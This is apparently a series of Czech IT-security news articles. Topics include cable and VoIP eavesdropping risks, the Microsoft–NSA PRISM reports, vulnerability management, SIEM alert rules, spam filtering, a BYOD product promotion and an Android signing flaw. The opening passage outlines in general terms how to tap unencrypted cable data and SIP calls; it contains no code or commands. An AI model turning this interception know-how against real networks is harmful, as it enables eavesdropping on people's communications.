Jak napadnout datový přenos? Je nutno získat fyzický přístup ke kabelu a zařízení podobné kabelovému modemu, které z kabelu získá datový tok. Rychlost toku bude pravděpodobně velmi vysoká, a je tedy vhodné získat identifikátory toku pro zákazníka, jehož si přejeme napadnout, a tato data pak filtrovat např. pro pozdější analýzu.
Většinou je přenos dat v kabelovém vedení nešifrovaný. Celá akce je však poměrně náročná a ve velkém procentu případů je rychlejší a jednodušší napadnout špatně zabezpečené Wi-Fi připojení zákazníka, než se pokoušet o napadení kabelového média.
V kabelových sítích také velmi často běží telefonní služba. V principu jde o vyhrazení určité kapacity kabelového média pro přenos digitálních telefonních hovorů. Telefonní data jsou komprimována a přenášena v paketech (Voice over Packet – VoP) speciálně označených kvůli definici kvality přenosu. Jako u internetu nejsou telefonní data šifrována, a tedy je možné je odposlechnout, rozhodne-li se operátor data šifrovat, má k dispozici například DES nebo AES šifrování.
Tím jsme se dostali k poněkud hůře uchopitelné komunikační síti, a to k internetové telefonii neboli Voice over IP (VoIP). Snad nejznámější službou je Skype. V případě Skypu je celé zabezpečení proprietární a nejsou k dispozici žádné obsáhlejší informace. Skype indikuje zabezpečení komunikace ikonou, a pokud se pokusíme komunikaci analyzovat, zjistíme, že je použito šifrování. Dalo by se tedy říci, že komunikace pomocí Skypu je relativně bezpečná proti nezákonnému odposlechu.
SIP Další velkou skupinou je hlasová komunikace na bázi protokolu SIP. Zde se zastavme, jelikož jde o velmi oblíbenou variantu VoIP, hlavně vzhledem k otevřenosti protokolu a dostupnosti telefonů přímo podporujících SIP, takže není nutno používat počítač. Dalším důvodem oblíbenosti je dostupnost mnoha operátorů nabízejících přístup do veřejné telefonní sítě právě přes SIP z internetu.
Protokol SIP sám o sobě podporuje několik forem autentifikace uživatelů počínaje prostou kombinací jméno : heslo a konče párem veřejného a privátního klíče uloženým na čipové kartě. A právě zde začíná část problémů, se kterými se uživatelé setkávají. Převážná většina operátorů podporuje pouze nejjednodušší autentikaci jménem a heslem v nezašifrované formě.
Někteří operátoři se pokoušejí zabránit vysokým účtům za telefon například omezením hovorů do zahraničí pouze z předdefinovaných IP adres. Málokdo ovšem má odvahu sáhnout k vyšší formě zabezpečení přihlašování právě z důvodu nepodpory na straně koncových zařízení. Další částí komunikace přes VoIP a pomocí protokolu SIP je zabezpečení hovorových dat samotných. SIP je použitý pro sestavení, rozpad a řízení spojení a hovorová data jsou přenášena protokolem RTP.
Protokol RTP Při sestavení spojení je pomocí SIP přenesena informace o jednotlivých účastnících spojení, parametrech přenosu zvuku a případně obrazu a bodech na trase, kterými má spojení procházet. Součástí parametrů je také dohoda na šifrování spojení a zde je opět kámen úrazu. K přenosu hlasu lze použít bezpečnou variantu RTP protokolu jménem SRTP nebo zabezpečení TLS.
Ovšem výrobci koncových zařízení velmi často neimplementují žádnou formu zabezpečení přenášeného hlasu či videa. Hlavně levnější varianty koncových zařízení jsou ochuzeny o zabezpečení jak RTP, tak i SIP. Co z toho všeho plyne?
Jestliže se odhodláváme přejít na VoIP, pak hodně záleží, jak operátor přistupuje k zabezpečení SIP, zda jeho brána do telefonní sítě podporuje TLS nebo SRTP a hlavně jaké koncové zařízení zvolíme. Přecházíme-li s firmou, pak je nutné se na bezpečnost ještě více zaměřit. Od určitého počtu se již vyplatí zakoupení lokální SIP ústředny a její instalace na vnitřní síti. Tím zjednodušíme konfiguraci VoIP zařízení, jelikož ta potřebují být nějakým způsobem dosažitelná z veřejného internetu. Také zabezpečení přístupu ke koncovým zařízením ze sítě bude jednodušší, jelikož přístup bude potřebovat pouze SIP ústředna.
Microsoft pomáhal NSA při špehování uživatelů
Společnost prozradila americké Národní bezpečnostní agentuře, jak obejít šifrovací systémy svých služeb, čímž jí umožnila špehování vybraných uživatelů.
Špionáž
S informací přišel britský deník Guardian, který získal dokumenty, z jejichž obsahu prý jasně vyplývá, že Microsoft s NSA aktivně spolupracoval. Softwarový gigant se brání, že ke spolupráci přistoupil pouze na základě právních nařízení.
Dokumenty získali britští novináři od Edwarda Snowdena, který se toho času stále skrývá na moskevském letišti a čeká, která země mu poskytne politický azyl. Jejich obsah do případu vnáší nové světlo. Ukazuje se totiž, že některé firmy s NSA na jejich kontroverzním programu PRISM spolupracovaly ve větší míře, než dosud přiznávaly.
Díky Microsoftu měla agentura volný přístup do většiny hlavních služeb společnosti. Špehováni tak mohli být uživatelé Hotmailu, Outlooku, SkyDrive nebo Skypu. Společnost přitom NSA sama pomohla obejít některé bezpečnostní mechanismy.
V dokumentech se NSA také chlubí, že v případě Skypu se jí podařilo zlepšit sledování hovorů na takovou úroveň, že mohla o uživatelích získávat až třikrát více informací než kdy předtím. NSA prý hovory vedené přes Skype odposlouchávala již v době, kdy ještě služba nebyla součástí Microsoftu.
Dokumenty vládní agentury podle všeho mají původ v divizi Special Source Operations, která dohlíží na propojení NSA a technologických firem.
Ve svém posledním prohlášení, kterým Microsoft reagoval na článek v Guardianu, se společnost brání, že spolupráci s NSA nemohla z právních důvodů odmítnout. „Máme jasné principy, kterými se řídíme při reakci na vládní požadavky na zpřístupnění uživatelských dat. Důvodem může být jak porušení zákona, tak i otázka národní bezpečnosti,“ uvádí se v prohlášení Microsoftu.
V některých případech musí být takový přístup k uživatelským informacím zachován i po aktualizaci či upgradu služby. Každý požadavek vládní agentury však prý Microsoft posuzoval zvlášť. O nějakém plošném zpřístupnění služeb podle jeho slov nemůže být řeč. „Microsoft žádné vládě neposkytl neomezený přístup do SkyDrive, Outlook.com, Skypu, nebo jiných svých produktů,“ píše se v prohlášení.
Správa zranitelností: Mocný nástroj pro bezpečnost IT
Zranitelnosti lze nalézt ve většině programů a zařízení. Je jen otázkou, zda je útočníci objeví a dokážou zneužít. Riziko těchto ataků může snížit implementace systémů správy zranitelností, které umí řadu chyb v systémech IT odhalit a případně odstranit.
Zranitelnosti
Program správy zranitelností VMP (Vulnerability Management Program) identifikuje slabá místa v síti organizace, monitoruje a sleduje jejich odstraňování, analyzuje prvotní příčiny těchto zranitelností a dělá strategické změny existujících procesů, aby byly prvotní příčiny tohoto stavu odstraněny.
Zranitelnosti jsou zjišťovány nějakým druhem hodnocení, jako je například posouzení následků. Nalezené chyby se přezkoumají a je kontaktuje se vlastník náchylného zařízení, jemuž se oznámí, že jeho systém obsahuje zranitelnost, kterou je nutné odstranit.
Vlastník systému chybu, jež vede k potenciálnímu ohrožení, odstraní a dá příslušnému administrátorovi vědět, že byla zranitelnost eliminována.
Dále se prověří prvotní příčina zranitelnosti, aby se zjistilo, proč se slabé místo v příslušném řešení vyskytlo (to znamená například chybějící oprava, konzole správce webu s výchozím heslem, SSLv2 atd.).
Rovněž se upraví aktuální procesy organizace (proces správy oprav, dokumentace základu minimálního zabezpečení, zásady a postupy atd.), tak aby se zabránilo opětovnému výskytu této zranitelnosti v budoucnu.
Základem je správné nastavení Většina programů správy zranitelností velmi významně spoléhá na skenery sítě a webových aplikací, přestože by tyto technologie měly být doplněny manuálními kontrolami, jako jsou například testování prostřednictvím útoků a penetrace a posouzení webových aplikací metodou grey box.
Vyzrálý program VMP je pro úspěšnost libovolného programu zabezpečení rozhodující. Může totiž v případě korektní implementace pomoci identifikovat slabiny v programu správy oprav, v konfiguracích firewallů a směrovačů, v základu minimálního zabezpečení, v zásadách a postupech, ve školení vývojářů webových aplikací atd.
Na druhou stranu však, pokud je vyvinutý špatně, může vést k celkovému falešnému pocitu bezpečí.
Jaké jsou tedy hlavní příznaky selhání programů správy zranitelností?
1. Každý měsíc se na stejném hostitelském počítači objevují stejné zranitelnosti Vytvořte zásady nutící vlastníky systémů k odstranění chyb, které byly v jejich systémech nalezeny. Tyto zásady by měly být přímo svázány se závažností zranitelnosti.
2. Každý měsíc se objevují stejné kategorie zranitelností Prvotní příčiny zranitelnosti nalezené při posudku zabezpečení se musí analyzovat. Jakmile je problém detekován, musí se upravit procesy, aby se tato zranitelnost už v síti znovu neobjevila. Úpravy procesů zahrnují mimo jiné změny programu správy oprav, změny současného základu minimálního zabezpečení, aktualizace skupinových zásad a podobně.
3. Osoba odpovědná za správu zranitelností musí brát antidepresiva Před posouzením zabezpečení je důležité, abyste udělali následující: zjistěte, kdo vlastní konkrétní zařízení ve vaší síti, mějte zavedeny zásady, které nutí vlastníky systémů odstraňovat zranitelnosti, zaveďte procesy vyžadující analýzy prvotních příčin zjištěných zranitelností, aktualizujte procesy, abyste zajistili, že se zranitelnost neobjeví znovu.
4. Neprošli jste kontrolou certifikovaného auditora PCI (PCI ASV, Payment Card Industry Approved Scanning Vendor) dva týdny po posudku zranitelností Při zjištění zranitelností je potřebné aktualizovat procesy, aby se odstranily nejen chyby, ale také proces, který jejich výskyt zapříčinil. Nesprávně nastavené procesy mohou zahrnovat správu oprav, pokyny pro zabezpečení počítačů a podobně.
5. Nemáte žádná důvěryhodná čísla prokazující fungování vašeho programu Metriky týkající se programu správy zranitelností pečlivě sledujte. Odborníci doporučují mít na zřeteli především následující ukazatele: počet zranitelností zjištěných během posudků zabezpečení, závažnost těchto chyb, doba uplynulá do jejich odstranění, kategorie zjištěných zranitelností a jejich prvotní příčina, zařízení, kde byly chyby zjištěny, a počet falešných výskytů.
6. Skener zranitelností dává nekonzistentní výsledky Při zjištění nekonzistencí je nutné najít jejich prvotní příčinu. Pokud pramení z použitých rozdílných nástrojů nebo metodiky, upravte tyto okolnosti tak, abyste získali srovnatelné výsledky. Pokud nekonzistence pochází z něčeho, nad čím nemáte žádnou kontrolu, a nemůžete nic změnit, abyste ji získali (například úpravou počtu souběžných vláken využívaných skenerem webových aplikací), kontaktujte odpovídajícího dodavatele, abyste vyřešili prvotní příčinu problému.
7. Mnohé z „falešných výskytů“ jsou skutečné zranitelnosti V případě, že se jako správce zranitelností dozvíte, že chyba je prý falešným výskytem, prověřte skutečný stav – tedy zda tomu tak je, nebo zda nejde o skutečnou zranitelnost. Nikdy ji neoznačujte za falešný výskyt, dokud jste neověřili, že byla skutečně zjednána náprava.
8. Spoléháte na to, že univerzální skenery zranitelností najdou zranitelnosti webových aplikací Ke skenování celé infrastrukturní sítě použijte všeobecné skenery. Z testů vyčleňte webové aplikace a na ně nasaďte specializovaný systém.
9. Skenování není doplněno ručním testováním Doplňte automatizované posouzení, jako je skenování zranitelností, i ručním otestováním s využitím technik jako testovací útoky, penetrační testy nebo manuální skenování ochrany webových aplikací.
10. V podniku neexistuje žádný program pro správu zranitelností Řešení tohoto problému zní na první pohled velice jednoduše (koupě příslušného produktu), ale může to být složitý proces. Jednoduše řečeno, řešením je totiž vytvoření plně funkčního programu správy zranitelností. Implementace ale může být poměrně komplikovaná, protože vytváření bezpečně fungujícího systému může vyžadovat hodně času a úsilí. Pamatujte si, že je lepší nejprve věnovat o něco více času samotnému programu správy zranitelností, než nasadit nedostatečně promyšlený produkt a pak řešit následky.
Úspěch znamená bezpečné IT Při vývoji programu správy zranitelností je nezbytné zajistit měření úspěšnosti programu, zajistit, aby byl program reaktivní i aktivní, aby se zranitelnosti odstraňovaly během předem daného časového plánu a aby se „falešné výskyty“ před akceptováním takového stavu ručně prověřily. Špatně implementovaný program správy zranitelností způsobí velké problémy a bezesné noci. Ačkoli vytvoření silného programu správy zranitelností od základu vyžaduje hodně práce, může být odměnou velký přínos pro celkový program zabezpečení.
Manažer bezpečnosti: Někdy si ušpiní ruce i manažeři
Pokud máte zredukovaný tým a dlouhý seznam úkolů, má občas smysl udělat některé věci osobně.
Bezpečnost
Trouble Ticket Co řešit: Potřebujeme provádět technické činnosti, avšak nemáme potřebný personál. Akční plán: I manažer může realizovat některé úkoly sám.
S méně početným týmem a nulovým rozpočtem na konzultanty jsem si musel, aby se práce zvládla, půjčovat IT pracovníky z jiných oddělení. To bylo užitečné, ale nikdo z nich nemá specifické dovednosti, aby mohl analyzovat složitá pravidla firewallu a NAT.
Nedávno jsem objevil závažné díry ve firewallech naší společnosti a nedostatek personálu způsobil, že jsem musel provést potřebný audit firewallu sám. To není nic špatného, že?
Myslím si, že když kromě řízení týmu dělám i nějakou inženýrskou práci, administrativu a činnost spojenou s architekturou, přidávám celému našemu týmu hodnotu. Když vyměním svou roli manažera za úlohu technika, je to téměř jako mít k dispozici další personál.
Manažer pro nikoho? Můj šéf si to ale nemyslí. V mém případě si přál, abych přestal dělat technickou práci a soustředil se pouze na řízení. Upřímně řečeno nevím, jak by to mohlo fungovat, když nejsme schopni najmout si technický personál a propouštění nás připravilo o některé z našich nejzkušenějších lidí.
Co je dobrého na tom, když se IT personál skládá hlavně z manažerů a není téměř nikdo, koho by mohli řídit?
Rozpočtová situace je opravdu špatná. Poté, co jsme dokončili rozpočtové plánování na další fiskální rok, rozhodla exekutiva o jeho snížení téměř na polovinu. To pro daný rok znamená nemít žádné nové projekty, technologie ani personál.
Mohlo by to být ještě horší, ale zatím se ještě nehodlám zabývat možností propouštění. Faktem nicméně je, že naše společnost stejně jako mnoho jiných bojuje o přežití. Nevím, co lze očekávat příště, ale nemusí to být dobré.
Mezitím pokračuji ve své práci na technologiích, a to navzdory nesouhlasu ředitele IT. Mathias Thurman nedávno psal, že jejich CIO zkoumal investice do produktu SIEM. Jsem rád, že jsem na stejné lodi, tj. že se nám podařilo koupit nástroj pro správu událostí a incidentů zabezpečení před příchodem současných problémů.
Máme tak alespoň přehled o dění v naší síti. Bohužel nemám nikoho, kdo by výsledky SIEM sledoval, a ani rozpočet na outsourcing tohoto monitoringu. Ve svém volném čase tedy píšu pravidla, která budou generovat upozornění a zašlou je přímo technické podpoře – což je ale v rozporu s pokynem našeho ředitele IT, abych se nezabýval technologickými záležitostmi a věnoval se jen řízení. Ale znovu, kdo jiný to udělá?
Na audit peníze jsou Ještě jedna věc mi teď leží na stole. Naše firma se teď hemží různými auditory vyžadujícími náročné zprávy o všech možných oblastech – jsou to například přístupová práva, protokoly incidentů, kontroly zabezpečení – a vše je povinné.
Činnosti související s dodržováním regulačních nařízení mají přednost před vším ostatním, a tak jimi bude uzurpována velká část mého úsilí ve zbytku letošního roku. Jedna dobrá věc z této nákladné a časově náročné směrnice však plyne (ani nechci přemýšlet, kolik platíme zmíněným auditorům – jsem si jistý, že je to víc než platový rozpočet celého mého oddělení).
Věci se zrealizují, když to vyžaduje legislativa. Neustále se divím, jak se to společnosti snaží přežít pouhým plněním minima požadovaného odpovídajícím předpisem namísto realizací opatření, která jsou správná a mají hodnotu.
Připadá mi, že stále mluvím o tom, jak jsou v mém světě špatné ekonomické poměry – škrty v rozpočtu, nedostatek personálu, zdrojů a propouštění. Těším se na den, kdy nebudeme v tak velkých potížích a budu moci psát o tom, jak je skvělé mít všechny potřebné zdroje pro odvádění skutečně dobré práce.
A ten den přijde, že ano?
Detekce spamu metodami dataminingu
Spam jsou e-maily, jež nechceme dostávat, které obtěžují a zaplavují schránku tak, že se v ní ztrácí běžná pošta. Jak jej eliminovat?
Spam
Schránky uživatelů elektronické pošty jsou zahlcovány množstvím nevyžádané pošty. Při jejím zpracování lze využít nástroje dataminingu s cílem vytvořit pravidlo pro vyhodnocení přicházející zprávy v reálném čase a odfiltrování zpráv považovaných za spam.
V elektronické poště se objevuje cokoliv. Často je to bohužel plevel v podobě nevyžádané korespondence, ať už jde o reklamu nebo dokonce o podvodné e-maily. Jejich přítomnost mezi skutečnou a často důležitou poštou pro uživatele e-mailové schránky je velice nepříjemná.
Při zpracování elektronické pošty a filtrování spamu lze využít nástroje dataminingu. Cílem je vytvořit pravidlo schopné vyhodnotit přicházející zprávy v reálném čase a odfiltrovat zprávy považované za spam. U filtrování spamu je dále třeba brát v potaz nechtěné odstranění zprávy, která spam neobsahuje. Musíme si tedy klást důležité otázky jako: „Kolik procent spamu se nám celkem podaří odfiltrovat?“ a „Kolik procent vyřazených zpráv nebylo spamem?“
První úprava Vzhledem k tomu, že zprávy obsahují textová pole, spadá tento problém pod úlohy textminingu. Samotný text patří společně například s obrázky nebo audiovizuálními záznamy mezi takzvaná nestrukturovaná data. Prvním úkolem bude tyto údaje zpracovat a převést na konkrétní příznaky a číselné hodnoty parametrů každé zprávy. S takto upravenými daty lze již pracovat a modelovat hledanou závislost, zda je zpráva spamem nebo ne.
Při převodu textu na strukturované údaje se nejprve text rozloží na jednotlivá slova a znaky, tyto prvky se nazývají tokeny. Z tokenů lze již snadno odvodit relativní četnosti slov, slovních spojení nebo specifických znaků v textu, jako jsou například hvězdičky či vykřičníky.
Další úpravou, kterou lze použít při zpracování textu, je stemming. Slova jsou převedena na svůj kořen. Využití této úpravy je známé obzvláště při vyhledávání a umožňuje nalézt nejenom konkrétní slovo, ale i jeho odvozené gramatické tvary. Rozšířením tohoto přístupu je lemmatizace, kdy hledáme základní tvar slova. Například slovo „lepší“ vzniklo stupňováním slova „dobrý“, avšak došlo ke změně kořene a stemming by tato slova nepovažoval za příbuzné. Lemmatizace využívá připravené slovníky a oběma slovům by přiřadilo stejné lemma. Složitější situace nastává v případě slov mnohoznačných. Například slovo „ženu“ může být slovesem nebo podstatným jménem ve čtvrtém pádě, a je tedy možné jej zařadit do dvou lemmat. Při rozeznávání správného lemmatu mohou též pomoci dataminingové modely.
V textminingu se dále využívá poměrně náročné extrahování konceptů. Slovo nebo slovní spojení je přiřazeno podle svého významu v rámci celého textu do konceptu. Ten zahrnuje slova nebo spojení podobného významu.
Jak snadno a rychle řešit řízený přístup do sítě – Enterasys Mobile IAM – BYOD
Podpora zařízení vlastněných zaměstnanci může zaměstnavateli přinést značné úspory, ale vyžaduje garanci uživatelské zkušenosti a nutí zaměstnavatele přemýšlet nejen o procesních, ale i bezpečnostních aspektech.
Zabezpečení
V dnešní době jsme svědky velkého rozvoje nejen počtu, ale i různorodosti komunikačních zařízení. Desktopy či notebooky a telefony nahrazují tablety, ultrabooky, chytré telefony, herní konzole a další novinky. Jejich uživateli jsou často zaměstnanci, kteří chtějí využívat vlastní zařízení jak pro soukromé, tak i firemní účely. Uživatelská zkušenost se stává základním parametrem při výběru či rozvoji komunikační strategie.
Podpora zařízení vlastněných zaměstnanci může zaměstnavateli přinést značné úspory (např. náklady na pořízení, provoz a správu těchto zařízení, odpovědnost za SW), ale vyžaduje garanci uživatelské zkušenosti a nutí zaměstnavatele přemýšlet nejen o procesních, ale i bezpečnostních aspektech. Musí tak řešit nejen problematiku MDM (Mobile Device Management), aby zabránil případnému úniku firemních dat z těchto zařízení, ale také ochranu vlastní sítě před možnými hrozbami z těchto zařízení. Je zřejmé, že bezdrátové připojení se stává hlavním a často i převažujícím způsobem připojení. Uživatelé však vyžadují kvalitní a rychlé připojení, aniž by chtěli být obtěžováni instalací nejrůznějších agentů, vyplňováním formulářů či nechat zařízení prověřit na příslušném IT oddělení. Nikdo nechce být obtěžován několika různými přihlášeními podle toho, z jakého zařízení či aplikace se připojuje, či různými SSID podle toho, jaké zařízení a v jakém místě právě používá. Zaměstnanec má své jméno a heslo, host pak přístup po registraci (s možností sponzorské) s odsouhlasením podmínek v rámci přihlašovacího portálu. Je na síťové infrastruktuře, aby přidělila následně práva v síti podle identity zařízení a role uživatele v organizaci.
Základní myšlenkou řešení Enterasys Mobile IAM (Identity and Access Management) je poskytnout komplexní BYOD řešení, které poskytuje kompletní bezpečnost, plnou kontrolu IT a předvídatelné chování sítě a aplikací pro všechny uživatele. Mobilní IAM poskytuje celkovou viditelnost a kontrolu nad jednotlivými zařízeními, uživateli a aplikacemi, a to i ve smíšených infrastrukturách. Řešení poskytuje kompletní software pro správu identit, přístupu do sítě a správu aktiv (inventory management), prosazení síťových profilů na základě kontextu přihlašovacích informací, případně bezpečnostního auditu, end-to-end řízení z jediné, snadno ovladatelné aplikace pro správu, audit a reporting.
Autorizace zařízení do sítě je postavena podle zákazníkem definovaných pravidel. Ta mohou kombinovat atributy (až 50) jako jsou např. místo, operační systém, typ zařízení, čas, členství ve skupinách LDAP, bezpečnostní stav.. V návaznosti na takto definované podmínky je autorizace buď zamítnuta, nebo povolena. V případě povolení je aplikován bezpečnostní profil, který udává například VLAN, prioritu (802.1p i DSCP/ToS), omezení rychlosti, L2-L4 filtrační pravidla, L2-L4 pravidla pro QoS, zrcadlení provozu, topologii atd. Řešení poskytuje příjemné grafické prostředí, podporu pro operátory helpdesku, reporty pro doložení shody s regulativy.
Hlavní výhody
Profilování přístupového zařízení na více úrovních – až 50 atributů včetně např. automatické detekce operačního systému, fyzického typu zařízení, MAC adresy, lokace, čas a historie připojení, důvod, bezpečnostní stav po auditu…
Integrace s MDM (MobileIron, Sybase a další), ale i VoIP (Avaya, Siemens a další), energy efficient systémy, videokonferenčními systémy, správu virtualizace (Vsphere, Microsoft HyperV, Citrix XenServer)
Kontrola zdravotního stavu – bezagentová (síťová) i agentová
Flexibilní nasazování – místo týdnů či měsíců řádově dny
Škálovatelnost řešení od 500 až po 100 000 identit, možnost redundance řešení včetně plně virtualizovaného řešení
Otevřené řešení, kompatibilní se sítěmi jiných výrobců (podpora RFC 3580) - implementováno u několika zákazníků i v ČR
Jednotná databáze – hosté, uživatelé, typ zařízení, operační systém, lokace, stav
Nástroje pro helpdesk
Velké množství reportů, včetně možnosti vytvářet a upravovat je
Přehledný dashboard
Možnost přístupu přes mobilní zařízení včetně integrace se sociálními sítěmi typu Facebook, LinkedIn, Twitter
Microsoft vydá šest kritických aktualizací
Microsoft dnes vydává balík aktualizací pro své produkty, které opravují šest kritických chyb v jeho produktech. Mimo jiné i závažnou chybu v Internet Exploreru.
Zranitelnosti
Microsoft dnes, stejně jako každé druhé úterý v měsíci, vydává balík bezpečnostních aktualizací. Pro červenec má společnost přichystány opravy šesti kritických chyb, jež útočník může zneužít ke vzdálenému spuštění kódu. Microsoft již několik dnů před vydáním aktualizací vydal obecný popis chyb, aby se na ně správci mohli připravit.
Šest kritických chyb, jež jsou tentokráte opravovány, se nachází v operačním systému Windows, .NET Frameworku, Silverlightu, sadě Office, Visual Studiu, systému Lync a Internet Exploreru (IE). Sedmá aktualizace je označena jako „důležitá“ a týká se bezpečnostního softwaru Windows Defender. Bezpečnostní analytik Wolfgang Kandek ze společnosti Qualys na svém blogu napsal, že nejdůležitější aktualizace se týká Internet Exploreru, jelikož opravuje díru v IE verzí 6 až 10 v operačních systémech Windows XP, Vista, 7, 8, Server 2003, Server 2008 a RT. Tyto operační systémy využívají stovky milionů lidí po celém světě.
Jak dále uvedl Kandek, Microsoft taktéž opraví zranitelnost typu zero day objevenou bezpečnostním analytikem Tavisem Ormandym. Tato chyba se týká způsobu, jakým je spravována paměť. Microsoft tuto zranitelnost označenou jako CVE-2013-3660 popsal jako „již déle známý problém ve Windows“.
Dnešní den bude pro správce systému trochu jiný než v jiných měsících. „Co se týče množství aktualizací, nejde o nic převratného, Microsoft však dnes vydá nadstandardní množství kritických oprav,“ dodal Kandek.
Bezpečnost komunikačních sítí v praxi: Pevné sítě
Pevné sítě jsou v současné době v mírném útlumu. Ovšem v přístupu k datovým službám hrají s převahou prim. V pevných sítích se nic nepřenáší vzduchem, ovšem v některých případech je snadnost napadení k neuvěření.
Zabezpečení
Pevné sítě v dnešní době užíváme k přenosu jak hlasových služeb, tak dat. Obojí lze přenášet jak v analogové formě, tak i digitálně. V současnosti se v našich končinách již analogový přenos dat vyskytuje velmi sporadicky, ovšem v oblasti hlasových služeb v pevných sítích je analogová forma přenosu stále oblíbená.
Pevnou sítí v kontextu tohoto seriálu jsou myšleny následující čtyři sítě. Analogová telefonní síť, tzv. POTS (Plain Old Telephone System), nyní provozovaná majoritně společností Telefónica O2, jejímž hlavním určením je přenos hlasových služeb. Také je možno na této síti přenášet data za použití tzv. modemu, ovšem pouze ve frekvenčním rozsahu vyhrazeném hlasovým službám, a tedy nepříjemně pomalu. Typickými zástupci přenosu dat v pásmu hlasové komunikace pevné telefonní sítě jsou fax a dříve obvyklý telefonní analogový modem.
Dalším typem sítě je síť ISDN. V tomto případě jde o digitální variantu podporující různé typy služeb a v našich krajích podporuje dvě různé konfigurace. BRI, jenž definuje dva digitální B kanály o rychlosti 64 kb/s a jeden signalizační D kanál 16 kb/s, přičemž frekvenční pásmo vyhrazené pro tento typ komunikace je o málo širší než v případě POTS. Obě pásma se však překrývají, a tudíž na jedné přípojce neboli jednom metalickém vedení lze provozovat standardně pouze jedinou z technologií POTS nebo ISDN-BRI.
Druhý typ konfigurace je ISDN PRI, která podporuje 31 datových kanálů (B kanál) o rychlosti 64 kb/s a jeden signalizační datový kanál (D kanál) o rychlosti také 64 kb/s. Zde je šířka pásma pochopitelně větší. U obou typů ISDN je shodně zásadní rozdíl mezi vlastnostmi datových kanálů a signalizačního kanálu.
Manažer bezpečnosti: Optimální využití SIEM
Šéf IT není přesvědčen o dostatečné hodnotě investic do nástroje SIEM pro správu událostí a incidentů zabezpečení.
Bezpečnost
Trouble Ticket Co řešit: Ředitel IT chce znát návratnost investic do nástroje SIEM ještě před povolením rozšíření jeho nasazení. Akční plán: Najít nové způsoby, jak odvodit hodnotu z nástroje SIEM.
Náš ředitel IT i nadále pokračuje ve zpochybňování hodnoty naší investice 250 tisíc dolarů do nástroje pro správu událostí a incidentů zabezpečení (SIEM, Security Incident and Event Management). Chci po něm v rozpočtu na příští rok více peněz, aby bylo možné SIEM rozšířit i do dalších našich regionů, a on chce vědět, co za ty peníze dostane. Moje obvyklá odpověď je, že můžeme lépe odhalit škodlivou aktivitu v síti díky sofistikovaným korelačním pravidlům, které můžeme vytvořit. To mu však nestačí, takže musím myslet nekonvenčně. Jeden nápad jsem dostal během setkání s naším manažerem auditů a rizik, který zmínil, že jednou z jeho povinností je provádět audit finančního systému. Tato poznámka mě vedla k vytvoření pravidla, které sleduje, kdo se přihlašuje do finančního systému a jaké protokoly jsou vytvářeny při vykonání finančních transakcí, jako jsou vystavení šeku nebo zpracování platby při elektronickém přenosu finančních prostředků. Toto pravidlo říká, že kdykoliv je vystaven šek pro přihlášenou osobu nebo pro libovolného zaměstnance, mělo být dojít k vydání odpovídajícího varování. Další nové pravidlo zase vygeneruje upozornění, když se někteří lidé přihlašují do systému s neobvyklou četností za den. Také jsem zaměřil svou pozornost na účty správců domény. Držitelé těchto účtů si například mohou zobrazit e-maily, kalendář i kontakty našeho šéfa IT nebo se u libovolné osoby podívat na sdílený disk, počítač nebo knihovnu dokumentů Microsoft SharePoint. Když jsem poprvé přišel do této firmy, byly účty správy domény doslova rozdávány jako lízátka. Pokud jste například byli zařazeni na pracoviště technické podpory, automaticky jste takové oprávnění dostali. Jsi nový správce IT? Zde máš účet správce domény. Vítejte v naší společnosti! Od té doby jsem tuto praxi zarazil a zavedl podmínky k vytvoření účtu správy domény, mezi které patří můj souhlas. Tato opatření pomohla snížit počet účtů správy domény o 60 %. Čas od času však stále dochází k vytvoření takových účtů i bez mého souhlasu. Vytvořil jsem proto pravidlo v našem nástroji SIEM k zaznamenání událostí spojených s identity managementem, když dojde k vytvoření účtu správy domény – a samozřejmě nastane také varování. Pokud vidím, že nebyl udělen souhlas, dojde k řešení problému.
SIEM pozoruje DMZ Také jsem si všiml možnosti využívat nástroj SIEM při mých snahách lépe kontrolovat umístění zdrojů v DMZ (demilitarizovaná zóna), což je část naší sítě, která je dostupná z internetu. Jak jsem již vysvětlil dříve, zdroje v DMZ jsou v zaměřovačích hackerů a dalších zlomyslných jedinců. I když jsem tvrdě zakročil proti zdrojům, které zbytečně způsobovaly naši zranitelnost, a odstranil je, nebylo snadné identifikovat všechny nebezpečné počítače, které jsou umístěny v nějaké z mnoha našich DMZ. Skutečnost, že se náš ředitel IT velmi zajímá o problémy s DMZ, významně zvyšuje atraktivitu monitorování DMZ pomocí SIEM. Napsal jsem tedy pravidlo pro detekci nových IP adres přidaných do sítí DMZ porovnáním dat s našimi skeny Nessus. Je-li zdroj přidán bez souladu s řízením změn nebo bez přezkoumání architektury, nastane odpovídající reakce. Moje nová pravidla mi poskytla solidnější odpověď, až se mne příště ředitel IT zeptá na návratnost investic, kterou lze očekávat v souvislosti s nasazením nástroje SIEM. Kromě standardní odpovědi, že jsme zabránili úniku citlivých dat ze společnosti prostřednictvím tajných kanálů řídicích serverů hackerů, mohu říci, že jsme zabránili přidání deseti neautorizovaných serverů do jím bedlivě sledované DMZ a také jsme zabránili čtyřem uživatelům ve zbytečné možnosti číst jeho e-maily. Z finančního systému dosud žádné údaje nejsou, ale když budou, myslím, že to našeho šéfa IT konečně přesvědčí.
V Androidu je čtyři roky závažná bezpečnostní chyba
Poslední čtyři roky v operačním systému Android existuje zranitelnost, jež útočníkům umožňuje změnit jakoukoli legitimní aplikaci tak, aby fungovala jako trojský kůň.
Zranitelnosti Mobil
S informací přišel americký startup Bluebox Security, který chybu objevil a na konferenci Black Hat ji minulý měsíc prezentoval publiku. Tato zranitelnost využívá způsobu, jakým jsou androidové aplikace kryptograficky ověřovány, a umožňuje útočníkovi pozměnit soubor APK bez poškození kryptografického podpisu. Když je aplikace nainstalována na zařízení, Android uloží její digitální podpis a všechny další aktualizace pro danou aplikaci musejí mít stejný podpis, aby se ověřilo, že pocházejí od jednoho autora. Chyba, kterou objevil Bluebox, však útočníkům umožňuje přidávat nebezpečný kód do již podepsaných aplikací bez prolomení digitálního podpisu. Chyba v Androidu existuje od jeho verze 1.6 (kódové označení Donut), což znamená, že je ve všech zařízeních s tímto operačním systémem vydaných v uplynulých čtyřech letech. „V závislosti na typu aplikace může útočník chybu zneužít pro cokoli od krádeže dat až po vytvoření mobilního botnetu,“ uvedl Bluebox. Útočníci díky chybě mohou také získat plnou kontrolu nad zařízením. Aplikace s trojskými koňmi se v současné době distribuují pomocí řady cest, především mailu, webových stránek nebo nahráním do obchodů s aplikacemi. Dobrou zprávou je, že distribuce závadných aplikací využívajících objevené chyby přes obchod Google Play není možná, jelikož Google pozměnil vstupní ověřovací proces pro aplikace tak, aby tomuto problému zabránil. Společnost navíc uvedla, že v jejím obchodu žádný software, který by byl 